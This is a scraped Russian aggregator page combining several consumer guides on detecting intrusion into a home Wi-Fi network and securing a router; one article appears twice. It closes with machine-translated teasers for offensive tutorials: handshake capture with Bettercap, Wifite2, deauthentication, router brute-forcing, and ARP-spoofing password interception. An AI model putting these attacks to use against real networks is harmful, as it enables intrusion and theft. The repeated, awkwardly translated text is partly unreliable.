HomeРазноеКак узнать что взломали вай фай: Как узнать взломан или нет домашний Wi-Fi

Как узнать что взломали вай фай: Как узнать взломан или нет домашний Wi-Fi

Содержание

Как узнать взломан или нет домашний Wi-Fi

Все
новые роутеры имеют надежные способы аутентификации и практически невозможно
взять с лёгкостью и взломать определенную точку доступа, тем более, если вы
установили надежный пароль. Однако есть такие методики, которые все равно
позволяют отыскать уязвимости, после чего произвести взлом. Бывает такое, что подбирать
пароль от беспроводной сети Интернет ненужно, а все оттого, что многие не знают,
как правильно настроить роутер в связи с этим ненастроенная точка доступа
становится лакомым кусочком практически для всех. В этой теме как раз и будем
проверять взломан наш домашний Wi-Fi или
нет. Существует пару способов проверить это.  

«Взломанный» Wi-Fi — это не только потеря
скорости загрузок из Интернета, а и большая вероятность того, что злоумышленник
получит доступ к компьютеру. После чего с легкостью завладеет файлами из общих
папок. И это еще не самое страшное получив доступ к вашей сети, он сможет
использовать ее как прикрытие, совершая преступления под видом вашего
соединения. 

— Первый симптом, свидетельствующим
о том, что ваше Wi-Fi — соединение кто-то использует характерно значительное занижение
скорости Интернета без особых на то причин. Не расстраивайтесь, бывают перебои
в сети, но перепроверить этот факту лучше сразу. Тем самым проверить свое
опасение на взлом, далее напишу один из способов. 

— Скажу сразу если вы
опытный айтишник, то сможете, без труда определить насколько активно
используется ваша сеть по индикаторам. Светодиодные лампочки WAN (или им
подобные) должны быть активными только тогда, когда роутер обменивается
пакетными данными через Интернет. Перед проверкой вы должны убедиться, что все
ваши гаджеты отключены, и если огоньки на роутере по-прежнему мигают, задумайтесь,
скорее всего, у вас появился сёрфингист лазающий по Сети. Повторюсь еще раз,
что этот способ является не идеальным кроме того вы должны хорошо разбираться в IT-технологиях. Во-вторых вам придётся ходить по дому и
отключать огромное количество устройств потребляющих Wi-Fi,
а их очень много. Да и не всегда можно увидев индикацию сказать, точно потребляется
трафик или нет. 

— Теперь поговори о проверенном и в то же время довольно
таки простом способе. Им является банальный мониторинг таблиц из настроек
роутера, маршрутизатора, модема. Все очень просто набираем через браузер IP-адрес
устройства. В основном он идет стандартный «192.168.1.1». Бывает такое, что он
отличается от обычного не беда узнать его можно в свойствах сетевого
подключения. Быстрым способом узнать адрес роутера в любой версии Windows можно через командную строку. Запускается она
во всех ОС одинаково. Запускаем командную консоль по следующему пути «Пуск?Поиск?cmd
+ нажимаем Enter» в открывшейся консоли прописываем команду «ipconfig» нажимаем
ввод. Находим строку Ethernet adapter, ниже ищем «Основной шлюз…» напротив этой
надписи адрес роутера. 

ping-ip-adresa.png 

Теперь мы знаем реальный
адрес нашей сетевой точки доступа, осталось прописать его в веб-обозревателе
нажать ввод, перед нами откроется окно, в виде админ панели роутера вводим логин
и пароль. Они по умолчанию, как
правило, прописаны в инструкции или на модеме с обратной стороны. Обычно пароли
и логин идут стандартные admin/admin, admin/1234 иногда даже пустые поля.

Попав в настройки роутера,
ищем что-то похожее на перечень подключений или лог подключенных устройств, к примеру,
это может выглядеть вот так «Client List или Connected Devices» в моем случае
это «Status»DNCP». В нем вы увидите все гаджеты, которые в настоящий момент подключены к
Интернету через вашу точку доступа. Найти свои устройства будет очень легко по
IP-, MAC-адресу или названию. Проверяйте внимательно при выявлении «левого»
адреса рекомендую его занести в черный список. Или как минимум ограничьте его в
возможности использовать Интернет, пока не выясните ваш это адрес или нет.

obnaruzhenie-vzlomschika-wifi-seti.png

— Скажу сразу, что штатными функциями самого
роутера получить полную информацию не получится. Подробную информацию можно
будет получить при помощи бесплатной программы MoocherHunter, ее используют некоторые структуры правоохранительных
органов как поисковик Wi-Fi воров. Как
заявляет разработчик, данная утилита способна анализировать сетевое трафик с
большой точностью в 2 метра при этом определяет местонахождение устройства во
время обмена пакетными данными по Wi-Fi.

Она распространяется
бесплатно в виде загрузочного образа. Для поиска необходим ноутбук с дешёвой антенной
(directional antenna), она покупается отдельно, собрав все это до кучи,
производим поиск, двигаясь, это необходимо для наиболее точного определения
вора.

Первое и
самое необходимое для защиты Wi-Fi сети 

Самое первое, что необходимо проверить так это пароль. Если ваше Wi-Fi-соединение
не имеет пароля, рекомендую его немедленно установить. Иначе его отсутствие гарантирует,
что со временем к нему подключатся посторонние люди, можете не сомневаться в
этом. Допустим, вы поставили пароль, но в силу каких-то обстоятельств кому-то
удалось подключиться к вашей сети, это говорит о том, что вы использовали
недостаточно надежный пароль или же сам метод его ввода был установлен слабым. В
этом случае рекомендуется сделать пароль сложнее, длиннее, а в качестве
протокола безопасности использовать шифрование WPA2-AES, поскольку в шифровании
(на­пример, WEP), были выявлены некоторые уязвимости, упрощен взлом.

Практика показывает в ряде случаев установленный WPA2 пароль взломать
практически невозможно. Но есть и минусы в данном шифровании, его могут не
воспринимать очень старые роутеры, операционные системы Microsoft до Windows XP
SP2. Многие устройства могут определять такие сети, но не совсем, умеют к ним
подключаться. В таком случае рекомендуется использовать протокол WPA это все равно намного лучше, чем совсем
незащищенная сеть.

Незабываем менять логин и пароль
на сам вход админ панели Wi-Fi роутера. На этом нашу тему про систему
безопасности домашней Wi-Fi сети
можно считать оконченной. Пример роутера, который упоминался здесь можно найти
в этой теме «Настройка WiFi роутера D-link 1155».

Как проверить, взломан ли ваш Wi-Fi и Средства защиты » Webtun

Современные способы аутентификации в роутерах не позволяют взломать точку доступа, если установлен достаточно надежный пароль. Тем не менее кое-какие более старые методы имеют известные уязвимости и взламывались неоднократно. Для подключения к чужому Интернету иногда даже не обязательно подбирать пароль – некоторые неопытные пользователи при настройке роутера оставляют точку доступа открытой, и в результате к ней может подключиться любой желающий. Узнать о том, используется ли ваше Wi-Fi-соединение посторонними, можно несколькими способами.

Способы обнаружения
«Дырявый» Wi-Fi означает не только снижение скорости загрузки из Интернета. Если на компьютере есть общие папки, то другие пользователи получат к ним доступ. Также чужая точка может стать отличным прикрытием для совершения незаконных действий в Сети.

1. Итак, первым звонком, сигнализирующим о том, что Wi-Fi-соединением пользуется кто-то еще, является регулярное снижение скорости доступа в Интернет. У этого факта есть и сотня других причин, но уточнить стоит всегда. Чтобы наверняка проверить свою догадку, необходимо применить один из методов, которые будут описаны чуть ниже.

2. Навскидку интенсивность использования точки доступа можно определить и по индикаторам. Лампочка WAN (или аналогичная) должна быть активна в том случае, когда роутер обменивается информацией по Интернету. Если вы уверены, что все устройства в данный момент отключены, а лампочка все равно мерцает, не исключено, что серфингом по Сети занимаетесь не вы одни. Конечно, у этого способа есть свои недостатки. Во-первых, обилие устройств с Wi-Fi (смартфоны, ноутбуки, консоли, домашняя техника) приводит к тому, что отключать их все не очень удобно, долго и, кроме того, всегда можно что-то пропустить. Также сложно сказать, как именно работает индикатор на каждом конкретном роутере. Он вполне может периодически мерцать, даже если все устройства деактивированы.

IP-адрес роутера можно узнать с помощью команды ipconfig

3. Надежным и в то же время быстрым является метод просмотра таблицы подключенной к роутеру техники. Для этого необходимо набрать в браузере его IP-адрес. По умолчанию это обычно «192.168.1.1». В случае применения другого его можно узнать в свойствах сетевого подключения. Универсальным приемом для любой версии Windows является использование командной строки. Следует запустить командный интерпретатор (Пуск→Поиск→cmd + нажать Enter) и выполнить команду ipconfig. В разделе Ethernet adapter Local Area Connection адрес роутера отобразится напротив надписи Default Gateway.

Список подключенных устройств в настройках роутера
Как проверить, взломан ли ваш Wi-Fi и Средства защиты

После того как адрес точки доступа введен в веб-обозревателе, появится окно с запросом имени пользователя и пароля. Данные по умолчанию, как правило, указаны в документации модели или даже на ней самой. Зачастую применяются комбинации admin/admin, admin/1234 или просто пустые поля. В появившемся окне настроек роутера необходимо найти раздел с перечнем подключенных устройств – называться он может, например, Client List или Connected Devices. В самом списке будут отображаться те из них, которые в текущий момент соединены с Интернетом через вашу точку доступа. Идентифицировать среди них свои можно по IP-, MAC-адресу или названию. Если в перечне обнаружены «чужаки», то их желательно занести в черный список. Но если вы сомневаетесь, что это несанкционированное подключение, просто временно понизьте ему приоритет до выяснения подробностей.

4. Системные средства и роутер не позволяют получить всю информацию об активных соединениях. Дополнительные данные поможет узнать специальная бесплатная утилита MoocherHunter (moocherhunter.securitystartshere.org), применяемая некоторыми правоохранительными органами для поиска Wi-Fi-воров. Как говорят разработчики, программа анализирует сетевой трафик и с точностью до 2 метров определяет местоположение устройства, обменивающегося информацией с Wi-Fi-точкой доступа.
Приложение распространяется в виде загрузочного образа. Взяв ноутбук и недорогую направленную антенну (directional antenna), которую необходимо приобрести отдельно, пользователь должен перемещаться в пространстве, чтобы методом триангуляции определить местоположение мошенника.

Средства защиты
Если Wi-Fi-соединение не защищено паролем, первым делом следует его установить. В противном случае можете не сомневаться, что подключение к нему посторонних лиц – всего лишь вопрос времени. Если пароль указан, но кто-то все равно подключился к роутеру, значит, пароль или метод защиты оказались слабыми. Пароль рекомендуется изменить и по возможности усложнить (сделать более длинным, добавить цифры), а в качестве протокола защиты выбрать WPA2-AES, поскольку в предыдущих (например, WEP) найдены определенные уязвимости, упрощающие взлом.
В ряде случаев использование WPA2 невозможно. Например, его не поддерживают относительно старые роутеры или операционные системы Microsoft до Windows XP SP2. Некоторые устройства могут видеть такие сети, но не умеют к ним подключаться. Тогда желательно установить протокол WPA. Если и с ним соединения не произойдет (например, у Nintendo DS не получится этого сделать), то можно перейти на WEP, что все же лучше, чем полная открытость.
Рекомендуется изменить пароль и на сам роутер (тот, который по умолчанию admin). Это выполняется в настройках устройства в разделе администрации.

Очнитесь, вас взломали. Как понять, что ваш Wi-Fi атакуют, и защититься | Сеть | Техника

Дома, на работе, в транспорте, в кафе и на прогулке — мы пользуемся Wi-Fi везде, где он есть. Что нужно знать о беспроводном интернете, чтобы не стать жертвой хакеров, АиФ.ru рассказал эксперт по информационной безопасности HeadLight Security Олег Купреев.

1. С точки зрения компьютерной безопасности, Wi-Fi успешно взламывается на протяжении последних 10 лет.

Сегодня заветный пароль для взлома сети настоящий хакер может получить примерно за минуту. Это походит на откровенный провал в области безопасности Wi-Fi. Более того, это актуально и для домашних пользователей.

2. Использование общественных сетей Wi-Fi наиболее рискованно с точки зрения безопасности. Подобные сети, как правило, работают в открытом режиме без пароля для авторизации и какого-либо шифрования при передаче данных, так что о безопасности этих сетей речи не может быть в принципе.

3. Крайне опасно позволять устройству «запоминать» названия сетей и подключаться к ним автоматически.

Большинство устройств запоминают название Wi-Fi сети, к которой подключались хоть раз, и сразу подключаются к ней снова, если увидят её в эфире. Этим пользуются хакеры, которые придумали подменять оригинальную точку доступа «двойником» с таким же названием. На практике любой в Москве может сделать у себя открытую Wi-Fi сеть с названием «MosMetro_Free» и с удивлением увидеть, как к его точке доступа автоматически подключаются устройства людей, которые хотя бы раз подключались к Wi-Fi в метро. После того как жертва автоматически выберет поддельную сеть, устройство сразу же начинает проверять почту/сообщения в соцсетях, и для хакера получение доступа к учётным записям пользователя становится уже своего рода «делом техники».

4. Внимательно читайте все системные сообщения, иногда с их помощью можно отследить попытки взлома беспроводной сети. При реализации хакерами некоторых атак у пользователя может появиться сообщение, предупреждающее о том, что «сертификат безопасности подделан». Если оно появилось — будьте предельно осторожны, проверьте все подключения, перестрахуйтесь. Высока вероятность, что вас атакует хакер. Однако, как показывает практика, большинство людей закрывает их, даже не читая, чем лишь помогает хакеру.

5. Чтобы понять, взломан ли ваш Wi-Fi, достаточно зайти и посмотреть список клиентов беспроводной сети. Если вы заметили чужие компьютеры или устройства, то, скорее всего, он уже взломан. Чтобы заметить сам взлом в процессе, нужно устанавливать систему обнаружения вторжений. Однако практика показывает, что даже далеко не все компании настолько заботятся о безопасности, что уж говорить об обычных частных пользователях.

6. Эксперты советуют вообще не пользоваться открытым Wi-Fi, чтобы избежать рисков. Если же альтернатива в виде мобильного доступа в интернет отсутствует и других вариантов тоже нет, то следует озаботиться шифрованием данных, передаваемых в такой сети. Но это уже прерогатива продвинутых пользователей.

Читайте также: Когда и на каких московских дорогах появится Wi-Fi? >>

7. Безопасность Wi-Fi и роутера во многом зависит от производителя этого устройства. Особенно уязвимыми в последние годы являются роутеры производства D-Link, ZyXEL, Asus, Huawei.

8. Помогает ли от взлома сложный пароль для доступа к Wi-Fi? Да! Обратите внимание — суть сложности пароля не в длине, а в содержимом. Главное, чтобы он не был полностью цифровым или же стандартным словарным. При выборе пароля Wi-Fi следует стараться использовать разного рода спецсимволы вроде: @, #, *.

9. Для безопасности использования домашнего Wi-Fi не забывайте менять пароль на роутер со стандартного admin/admin на что-либо своё. Как показывает практика, большинство пользователей совсем не думают о безопасности роутеров, хотя через них идёт информация от всех их устройств.

Хакеры атаковали 250 млн роутеров, возможно, среди них ваш. 2 способа проверить его на факт взлома

Осенью прошлого года наметилась тенденция: хакеры начали атаковать домашние интернет-роутеры. По данным компании Trend Micro, в начале 2019 года фиксировалось по 9–10 миллионов попыток в месяц, а в декабре того же года число попыток составило почти 250 миллионов — в 25 раз больше. При этом мы вообще не думаем о безопасности устройства, тогда как с его помощью работают почти все наши девайсы.

Как взламывают роутеры?

Основных способа два: подбор пароля для подключения и программное обеспечение для взлома устройства. Причём наиболее распространённый способ — первый.

Для чего взламывают роутеры?

Самое безобидное — соседи не хотят платить за интернет и тайно подключаются к вам. Всё это время они пользуются вашей сетью и необходимости подключать собственную нет. В этом случае вы либо ничего не ощутите, либо увидите падение скорости интернета, потому что чем больше устройств подключено, тем он медленнее.

Гораздо опаснее кража личных данных. Злоумышленники могут заразить роутер вирусом, а он распространится по подключённым устройствам и соберёт конфиденциальную информацию о вас: пароли, файлы на устройстве, банковские карты или начнёт вести запись экрана.

2 признака, что ваш роутер взломан

1. Интернет работает медленнее обычного

Чем больше устройств подключено к вашей сети, тем медленнее становится загрузка сайтов или просмотр видео онлайн. Если вдруг скорость упала, а провайдер говорит, что проблема не на его стороне, имеет смысл посмотреть список подключённых устройств. Проверить скорость можно на сайте speedtest.net.

2. Посмотрите список подключённых устройств

Технологии. Главное по теме

Еще

Роутер с заводскими настройками чаще всего имеет один из следующих IP-адресов: 192.168.1.1, 192.168.2.1 или 192.168.178.1. Логин и пароль — как правило, admin, admin.

Если войти не получилось, запросите адрес, логин и пароль у провайдера. Отключите все подключённые устройства, которые работают в сети Wi-Fi, кроме одного — с него вы мониторите активность.

На роутере разных производителей это делается по-разному, вот как посмотреть подключённые девайсы на ZTE: пройдите по Сеть —> WLAN 2.4G —> Подключённые устройства и Сеть —> WLAN 5G —> Подключённые устройства. Если в списке больше одного устройства, значит, к вам подключены дополнительные.

Список подключённых к роутеру устройств. Вы можете отслеживать их с компьютера. Скрин © LIFE

Да, способов обнаружить взлом всего два. Обнаружить его практически невозможно, поэтому самый надёжный способ — постоянно мониторить подключённые устройства.

Как защититься от хакеров?

1. Заблокируйте неизвестные устройства

Вы можете заблокировать конкретный девайс. Вот как это делается на роутере ZTE:

пройдите по Сеть —> WLAN 2.4G —> Список контроля доступа. В поле MAC-адрес введите данные неизвестного устройства, в графе «Режим» выберите «Заблокировать». Примените настройки, и устройство не получит доступ к вашему Wi-Fi.

Блокируем возможность подключения конкретного устройства к вашему Wi-Fi. Достаточно ввести его MAC-адрес. Скрин © LIFE

Чтобы легче было ориентироваться, можно выполнить одно из двух действий: временно отсоединить от сети все свои устройства или узнать MAC-адрес каждого и найти лишние подключения методом исключения.

Вот как узнать MAC-адрес:

на Windows: Нажмите клавиши Win+R —> введите команду cmd —> в появившейся командной строке введите ipconfig /all —> нажмите Enter. Данные в поле «Физический адрес» — MAC-адрес вашего компьютера.

На macOS: Системные настройки —> Сеть —> Ethernet —> Дополнительно —> Аппаратура.

На Android: «Настройки» —> «Беспроводные сети» —> Wi-Fi —> иконка настроек —> «Расширенные настройки».

На iOS и iPadOS: Настройки —> Основные об этом устройстве. «Адрес Wi-Fi» — это MAC-адрес вашего iPhone или iPad.

2. Разрешите подключаться к Wi-Fi только конкретным устройствам

Роутер позволяет создать белый лист устройств, которые могут работать в его сети. Другие же не смогут к ней подключиться, и попытки подобрать пароль будут тщетны.

Пройдите по Сеть —> WLAN 2.4G —> Список контроля доступа. В поле «Режим выберите «Разрешить». И введите MAC-адреса устройств, которым можно подключаться к вашей сети.

Создайте «белый лист» устройств, которые смогут подключиться к вашему Wi-Fi. Список можно редактировать. Скрин © LIFE

3. Сбросьте настройки роутера

Алгоритм действий следующий: сбросьте настройки роутера на заводские и поменяйте пароль. Первое можно сделать с помощью кнопки Reset на устройстве. Зажмите кнопку на 8-10 секунд и дождитесь, пока индикаторы выключатся. Второе — в личном кабинете роутера.

Важно: прежде чем сбрасывать настройки, найдите и запомните название сети и пароль по умолчанию. Как правило, данные указываются на стикере, который клеится к задней панели роутера.

4. Используйте сложный и трудноугадываемый пароль

Ещё раз изучите список самых популярных и не используйте ни один из них. Придумайте тот, который легко запомнить вам и трудно подобрать злоумышленнику.

Вот три способа:

— вспомните припев любимой песни. Ваш пароль — первые буквы каждого слова. Например, припев легендарной Linkin Park — In the End: I tried so hard And got so far But in the end It doesn’t even matter. Получится itshagsfbiteidem;

— графический ключ: придумайте любую фигуру на клавиатуре и «проведите» пальцем по её контурам. Например, «нарисуйте» на ней улыбку;

— придумайте случайную фразу, замените одну букву на похожую по форме цифру или символ. Например, Лондон Париж, 0 вместо буквы o и № вместо буквы n. Получится l0№d0№paris.

Как узнать, что Ваша Wi-Fi сеть была взломана

Wi-Fi сеть – это весьма необходимая вещь для современного дома. От смартфонов и игровых консолей до интеллектуальных термостатов типа Nest – практически каждое устройство сегодня требует беспроводного Интернет-соединения.

Как результат, все виды ценной информации передаются через Вашу сеть Wi-Fi: номера банковских карт, пароли, личные фотографии и файлы. А это делает Вашу беспроводную сеть вполне естественной мишенью для кибер-преступников.

Удаленный взлом Вашей сети

Т.к. Вы не можете видеть сигналы беспроводной связи, Вы не можете точно сказать, насколько далеко они распространяются. Не такое уж и редкое явление, когда сигналы Вашей сети могут выходить за пределы Вашего дома или квартиры, а это предоставляет хакерам возможность подключиться к ней.

Используя элементарные инструменты взлома, можно обойти средства безопасности Wi-Fi сети всего лишь за 10 минут. Возможно, хакеры просто захотят использовать Ваше Интернет-подключение для выхода в онлайн – это не так страшно, как воровать Ваши критически важные персональные данные, но все же это кража.

Итак, как Вы можете узнать, что Ваша сеть Wi — Fi была взломана?

Первым признаком того, что Ваша сеть Wi-Fi была взломана, скорее всего, будет общее падение скорости доступа в Интернет. Чем больше людей подключено к Вашей сети, тем медленнее становится загрузка сайтов или просмотр потокового видео.

Если Вы заметили, что в Вашей сети происходит что-то странное, Вы должны разобраться в этом. Первое, что нужно сделать, — это проверить сам роутер Wi-Fi.


СПИСОК ПОДКЛЮЧЕННЫХ УСТРОЙСТВ

Войдите в Ваш роутер, используя Ваши имя пользователя и пароль (если Вы их не меняли с момента покупки – а это недопустимо, и Вам надо срочно их поменять! – то, как правило, они напечатаны на наклейке на задней панели). У каждого роутера бывает своя специфика, но Вам необходимо найти страницу со статусом Wi-Fi, на которой представлен список подключенных к Вашей сети устройств.

Эта информация может быть в разделе Подключенные устройства, Список устройств или Домашняя сеть, например.

Этот список может выглядеть в виде изображения, как показано на рисунке ниже (были заретушированы некоторые конфиденциальные данные):

Взгляните на список, проверьте, нет ли там неизвестных Вам устройств. Любые устройства, которые Вам незнакомы, указывают на то, что безопасность Вашей сети нарушена хакером.

Возможно, что некоторые устройства имеют «непонятные» имена, которые сперва нам могут ничего и не говорить, но при этом они полностью легитимны. Поэтому сперва проверьте все Ваши подключенные к Wi-Fi устройства, прежде чем паниковать!

ОГРАДИТЕ СЕБЯ ОТ ХАКЕРОВ

Существует ряд передовых технологий для повышения уровня безопасности Вашей Wi-Fi сети, такие как предоставление доступа к сети только конкретным устройствам на основе их уникального MAC-адреса. Гораздо проще, и почти также эффективно, — это просто выбрать более надежный с точки зрения безопасности протокол.Последний, наиболее безопасный вариант – это WPA2, как показано на рисунке ниже:

Но учтите, что если Вы измените настройки протокола безопасности, то Вам, возможно, потребуется заново подключить все Ваши Wi-Fi устройства, но это слишком маленькая цена, которую Вам придется заплатить, чтобы предотвратить возможность несанкционированного доступа хакеров в Вашу сеть.Также Вам следует добавить второй уровень безопасности, чтобы выставить барьер хакерам, которые все же смогут прорвать первую линию обороны. Речь идет про комплексное решение безопасности, которое должно быть установлено на Ваших ПК и мобильных устройствах с Android, что поможет Вам предотвратить случаи кражи Ваших персональных данных. Наличие таких решений также позволит Вам блокировать вирусы и защитить Ваших детей от нежелательных веб-сайтов.

БЕЗОПАСНОСТЬ WI — FI ПОСТОЯННО РАЗВИВАЕТСЯ

Вам необходимо быть в курсе того, что происходит в Вашей сети, чтобы не позволить хакерам завладеть ею. Наши советы помогут Вам понять, если в сети происходит что-то странное, и отреагировать должным образом.

Panda Security в России

+7(495)105 94 51, [email protected]

Ваш Wi-Fi взломали? Как вычислить непрошеных гостей

Наверх

  • Рейтинги
  • Обзоры

    • Смартфоны и планшеты
    • Компьютеры и ноутбуки
    • Комплектующие
    • Периферия
    • Фото и видео
    • Аксессуары
    • ТВ и аудио
    • Техника для дома
    • Программы и приложения
  • Новости
  • Советы

    • Покупка
    • Эксплуатация
    • Ремонт
  • Подборки

    • Смартфоны и планшеты
    • Компьютеры
    • Аксессуары
    • ТВ и аудио
    • Фото и видео
Хакеры атаковали 250 млн роутеров, возможно, среди них ваш. 2 способа проверить его на факт взлома

Осенью прошлого года наметилась тенденция: хакеры начали атаковать домашние интернет-роутеры. По данным компании Trend Micro, в начале 2019 года фиксировалось по 9–10 миллионов попыток в месяц, а в декабре того же года число попыток составило почти 250 миллионов — в 25 раз больше. При этом мы вообще не думаем о безопасности устройства, тогда как с его помощью работают почти все наши девайсы.

Как взламывают роутеры?

Основных способа два: подбор пароля для подключения и программное обеспечение для взлома устройства. Причём наиболее распространённый способ — первый.

Для чего взламывают роутеры?

Самое безобидное — соседи не хотят платить за интернет и тайно подключаются к вам. Всё это время они пользуются вашей сетью и необходимости подключать собственную нет. В этом случае вы либо ничего не ощутите, либо увидите падение скорости интернета, потому что чем больше устройств подключено, тем он медленнее.

Гораздо опаснее кража личных данных. Злоумышленники могут заразить роутер вирусом, а он распространится по подключённым устройствам и соберёт конфиденциальную информацию о вас: пароли, файлы на устройстве, банковские карты или начнёт вести запись экрана.

2 признака, что ваш роутер взломан

1. Интернет работает медленнее обычного

Чем больше устройств подключено к вашей сети, тем медленнее становится загрузка сайтов или просмотр видео онлайн. Если вдруг скорость упала, а провайдер говорит, что проблема не на его стороне, имеет смысл посмотреть список подключённых устройств. Проверить скорость можно на сайте speedtest.net.

2. Посмотрите список подключённых устройств

Технологии. Главное по теме

Еще

Роутер с заводскими настройками чаще всего имеет один из следующих IP-адресов: 192.168.1.1, 192.168.2.1 или 192.168.178.1. Логин и пароль — как правило, admin, admin.

Если войти не получилось, запросите адрес, логин и пароль у провайдера. Отключите все подключённые устройства, которые работают в сети Wi-Fi, кроме одного — с него вы мониторите активность.

На роутере разных производителей это делается по-разному, вот как посмотреть подключённые девайсы на ZTE: пройдите по Сеть —> WLAN 2.4G —> Подключённые устройства и Сеть —> WLAN 5G —> Подключённые устройства. Если в списке больше одного устройства, значит, к вам подключены дополнительные.

Список подключённых к роутеру устройств. Вы можете отслеживать их с компьютера. Скрин © LIFE

Да, способов обнаружить взлом всего два. Обнаружить его практически невозможно, поэтому самый надёжный способ — постоянно мониторить подключённые устройства.

Как защититься от хакеров?

1. Заблокируйте неизвестные устройства

Вы можете заблокировать конкретный девайс. Вот как это делается на роутере ZTE:

пройдите по Сеть —> WLAN 2.4G —> Список контроля доступа. В поле MAC-адрес введите данные неизвестного устройства, в графе «Режим» выберите «Заблокировать». Примените настройки, и устройство не получит доступ к вашему Wi-Fi.

Блокируем возможность подключения конкретного устройства к вашему Wi-Fi. Достаточно ввести его MAC-адрес. Скрин © LIFE

Чтобы легче было ориентироваться, можно выполнить одно из двух действий: временно отсоединить от сети все свои устройства или узнать MAC-адрес каждого и найти лишние подключения методом исключения.

Вот как узнать MAC-адрес:

на Windows: Нажмите клавиши Win+R —> введите команду cmd —> в появившейся командной строке введите ipconfig /all —> нажмите Enter. Данные в поле «Физический адрес» — MAC-адрес вашего компьютера.

На macOS: Системные настройки —> Сеть —> Ethernet —> Дополнительно —> Аппаратура.

На Android: «Настройки» —> «Беспроводные сети» —> Wi-Fi —> иконка настроек —> «Расширенные настройки».

На iOS и iPadOS: Настройки —> Основные об этом устройстве. «Адрес Wi-Fi» — это MAC-адрес вашего iPhone или iPad.

2. Разрешите подключаться к Wi-Fi только конкретным устройствам

Роутер позволяет создать белый лист устройств, которые могут работать в его сети. Другие же не смогут к ней подключиться, и попытки подобрать пароль будут тщетны.

Пройдите по Сеть —> WLAN 2.4G —> Список контроля доступа. В поле «Режим выберите «Разрешить». И введите MAC-адреса устройств, которым можно подключаться к вашей сети.

Создайте «белый лист» устройств, которые смогут подключиться к вашему Wi-Fi. Список можно редактировать. Скрин © LIFE

3. Сбросьте настройки роутера

Алгоритм действий следующий: сбросьте настройки роутера на заводские и поменяйте пароль. Первое можно сделать с помощью кнопки Reset на устройстве. Зажмите кнопку на 8-10 секунд и дождитесь, пока индикаторы выключатся. Второе — в личном кабинете роутера.

Важно: прежде чем сбрасывать настройки, найдите и запомните название сети и пароль по умолчанию. Как правило, данные указываются на стикере, который клеится к задней панели роутера.

4. Используйте сложный и трудноугадываемый пароль

Ещё раз изучите список самых популярных и не используйте ни один из них. Придумайте тот, который легко запомнить вам и трудно подобрать злоумышленнику.

Вот три способа:

— вспомните припев любимой песни. Ваш пароль — первые буквы каждого слова. Например, припев легендарной Linkin Park — In the End: I tried so hard And got so far But in the end It doesn’t even matter. Получится itshagsfbiteidem;

— графический ключ: придумайте любую фигуру на клавиатуре и «проведите» пальцем по её контурам. Например, «нарисуйте» на ней улыбку;

— придумайте случайную фразу, замените одну букву на похожую по форме цифру или символ. Например, Лондон Париж, 0 вместо буквы o и № вместо буквы n. Получится l0№d0№paris.

взлома Wi-Fi «Нулевой байт :: WonderHowTo

Как:
Измените координаты телефона, подменяя горячие точки Wi-Fi геолокации

Во многих городских районах GPS не работает хорошо. Здания отражают сигналы GPS на самих себе, чтобы создать беспорядочный беспорядок для телефонов, чтобы разобраться.В результате большинство современных устройств определяют свое местоположение, используя различные методы, в том числе близлежащие сети Wi-Fi. Используя SkyLift для создания поддельных сетей, о которых известно, что они находятся в других областях, мы можем управлять тем, где устройство думает, что это с помощью микроконтроллера ESP8266.

Как:
Взломать сети Wi-Fi 5 ГГц с адаптером Wi-Fi Alfa

Сети Wi-Fi бывают двух видов: более распространенные 2.4 ГГц, используемые большинством маршрутизаторов и устройств IoT, и 5 ГГц, предлагаемые в качестве альтернативы более новыми маршрутизаторами. Хотя может быть неприятно атаковать устройство, которое выходит за пределы досягаемости для сети Wi-Fi 5 ГГц, мы можем использовать двухдиапазонный адаптер Alfa для взлома устройств Wi-Fi в сети любого типа.

Как:
Взломай Wi-Fi сети с помощью Bettercap

Существует множество инструментов для взлома Wi-Fi, но лишь немногие из них настолько интегрированы и хорошо интегрированы, как Bettercap.Благодаря впечатляюще простому интерфейсу, который работает даже по SSH, легко получить доступ ко многим наиболее мощным атакам Wi-Fi, доступным из любой точки мира. Для захвата рукопожатий из посещенных и необслуживаемых сетей Wi-Fi мы будем использовать два модуля Bettercap, чтобы помочь нам в поиске слабых паролей Wi-Fi.

Как:
Взломай маршрутизаторы с Пататором

Шлюзы маршрутизатора отвечают за защиту каждого аспекта конфигурации сети.При беспрепятственном доступе к этим привилегированным конфигурациям злоумышленник в скомпрометированной сети Wi-Fi может выполнять самые разнообразные расширенные атаки.

Как:
Управляйте сетевым трафиком с помощью устройств ограничения дроссельной заслонки или отключения.

Если вы обнаружите, что ваш сосед по комнате ограничивает пропускную способность видеоиграми или обнаруживает, что сосед пригласил вас в вашу сеть Wi-Fi, вы можете легко вернуть себе доступ в Интернет.Evil Limiter делает это, позволяя вам контролировать битрейт любого устройства в той же сети, что и вы, позволяя вам замедлять или даже полностью останавливать скорость передачи данных для них.

Как:
Сканирование, подделка и атака Wi-Fi сетей с помощью WiFi-устройства на базе ESP8266

Цена взлома Wi-Fi резко упала, и недорогие микроконтроллеры все чаще превращаются в дешевые, но мощные хакерские инструменты.Одним из самых популярных является ESP8266, Arduino-программируемый чип, на котором основан проект Deauther Wi-Fi. На этой недорогой плате хакер может создавать поддельные сети, клонировать реальные или отключать все Wi-Fi в области с помощью гладкого веб-интерфейса.

Как:
Шпион на сетевых отношениях с Airgraph-Ng

Что если бы вы могли легко визуализировать, к какой точке доступа подключено каждое устройство Wi-Fi поблизости, за считанные секунды? В то время как такие программы, как Airodump-ng, могут перехватывать эту беспроводную информацию, еще одним вызовом является простота использования и понимания хакерами.К счастью, инструмент под названием Airgraph-ng может визуализировать отношения между устройствами Wi-Fi всего за несколько секунд беспроводного наблюдения.

Как:
Незаметно анализировать пакеты данных Wi-Fi с помощью ESP8266

Если вы хотите начать прослушивать сети Wi-Fi, вам обычно нужно начать с адаптера беспроводной сети.Но благодаря библиотеке сниффинга Wi-Fi, написанной на Arduino, и ультра-дешевому чипу ESP8266, он вам может не понадобиться. Менее чем за 10 долларов в области электроники вы можете создать крошечный анализатор Wi-Fi Arduino, который сохраняет файлы PCAP, совместимые с Wireshark, и помещается в любое место.

Как:
Автоматизация взлома Wi-Fi с помощью Wifite2

Есть много способов атаковать сеть Wi-Fi.Тип шифрования, настройки производителя и количество подключенных клиентов определяют, насколько легко атаковать цель и какой метод будет работать лучше всего. Wifite2 — это мощный инструмент, который автоматизирует взлом Wi-Fi, позволяя вам выбирать цели в диапазоне и позволить сценарию выбирать лучшую стратегию для каждой сети.

Как:
Используйте Ettercap для перехвата паролей с помощью спуфинга ARP

